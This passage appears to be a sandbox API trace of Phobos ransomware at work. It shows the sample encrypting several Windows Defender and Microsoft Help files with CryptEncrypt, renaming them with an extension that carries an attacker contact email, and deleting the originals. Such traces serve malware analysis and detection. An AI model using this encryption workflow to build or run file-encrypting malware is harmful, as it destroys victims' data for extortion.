Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasdlta.vdm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.537] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasdlta.vdm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0177.537] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.537] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.537] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasdlta.vdm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.064] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32be8) returned 1 [0178.064] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0178.064] ReadFile (in: hFile=0x158, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x52d90, lpOverlapped=0x0) returned 1 [0178.070] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x52da0, dwBufLen=0x52da0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x52da0) returned 1 [0178.073] WriteFile (in: hFile=0x180, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x52da0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x52da0, lpOverlapped=0x0) returned 1 [0178.078] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32968) returned 1 [0178.078] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0178.078] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0178.078] CryptDestroyKey (hKey=0xa32968) returned 1 [0178.078] WriteFile (in: hFile=0x180, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0178.078] CryptDestroyKey (hKey=0xa32be8) returned 1 [0178.078] CloseHandle (hObject=0x158) returned 1 [0178.078] CloseHandle (hObject=0x180) returned 1 [0178.079] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasdlta.vdm")) returned 1 [0178.082] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0178.082] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpengine.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.083] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=8199504) returned 1 [0178.083] CloseHandle (hObject=0x180) returned 1 [0178.083] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpengine.dll")) returned 0x2020 [0178.083] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpengine.dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpengine.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0178.083] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpengine.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.083] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0178.084] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0178.084] ReadFile (in: hFile=0x180, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0178.087] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x29b470, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0178.087] ReadFile (in: hFile=0x180, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0178.090] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x791d50, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0178.090] ReadFile (in: hFile=0x180, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0178.095] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32ce8) returned 1 [0178.096] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0178.096] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060) returned 1 [0178.114] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0178.114] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0178.114] WriteFile (in: hFile=0x180, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0112, lpOverlapped=0x0) returned 1 [0178.169] SetEndOfFile (hFile=0x180) returned 1 [0178.169] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x791d50, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0178.169] WriteFile (in: hFile=0x180, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0178.171] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x29b470, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0178.171] WriteFile (in: hFile=0x180, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0178.173] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0178.173] WriteFile (in: hFile=0x180, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0178.174] CloseHandle (hObject=0x180) returned 1 [0178.175] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0178.175] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0178.354] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=326) returned 1 [0178.355] CloseHandle (hObject=0x130) returned 1 [0178.355] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn")) returned 0x2022 [0178.355] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.355] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0178.355] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0178.355] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0178.355] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0178.355] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0178.355] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0178.356] ReadFile (in: hFile=0x130, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x146, lpOverlapped=0x0) returned 1 [0178.356] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x150, dwBufLen=0x150 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x150) returned 1 [0178.356] WriteFile (in: hFile=0x164, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x150, lpOverlapped=0x0) returned 1 [0178.357] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c28) returned 1 [0178.357] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0178.357] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0178.357] CryptDestroyKey (hKey=0xa32c28) returned 1 [0178.357] WriteFile (in: hFile=0x164, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0178.357] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0178.357] CloseHandle (hObject=0x130) returned 1 [0178.357] CloseHandle (hObject=0x164) returned 1 [0178.357] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn")) returned 1 [0178.359] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0178.359] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0178.359] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=338) returned 1 [0178.359] CloseHandle (hObject=0x164) returned 1 [0178.359] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn")) returned 0x2022 [0178.359] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.359] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0178.359] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0178.359] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0178.359] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0178.360] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0178.360] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0178.360] ReadFile (in: hFile=0x164, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x152, lpOverlapped=0x0) returned 1 [0178.361] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x160, dwBufLen=0x160 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x160) returned 1 [0178.361] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x160, lpOverlapped=0x0) returned 1 [0178.361] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c28) returned 1 [0178.361] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0178.361] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0178.361] CryptDestroyKey (hKey=0xa32c28) returned 1 [0178.361] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0178.362] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0178.362] CloseHandle (hObject=0x164) returned 1 [0178.362] CloseHandle (hObject=0x130) returned 1 [0178.362] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn")) returned 1 [0178.363] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0178.363] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0178.365] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=362) returned 1 [0178.365] CloseHandle (hObject=0x130) returned 1 [0178.365] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn")) returned 0x2022 [0178.365] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.365] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0178.365] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0178.365] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0178.365] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0178.366] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0178.366] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0178.366] ReadFile (in: hFile=0x130, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x16a, lpOverlapped=0x0) returned 1 [0178.367] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x170, dwBufLen=0x170 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x170) returned 1 [0178.367] WriteFile (in: hFile=0x164, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x170, lpOverlapped=0x0) returned 1 [0178.367] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c28) returned 1 [0178.367] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0178.367] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0178.367] CryptDestroyKey (hKey=0xa32c28) returned 1 [0178.367] WriteFile (in: hFile=0x164, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0178.368] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0178.368] CloseHandle (hObject=0x130) returned 1 [0178.368] CloseHandle (hObject=0x164) returned 1 [0178.368] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn")) returned 1 [0178.369] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0178.369] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0178.369] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=338) returned 1 [0178.369] CloseHandle (hObject=0x164) returned 1 [0178.369] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn")) returned 0x2022 [0178.369] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.369] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0178.369] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0178.369] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0178.369] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: 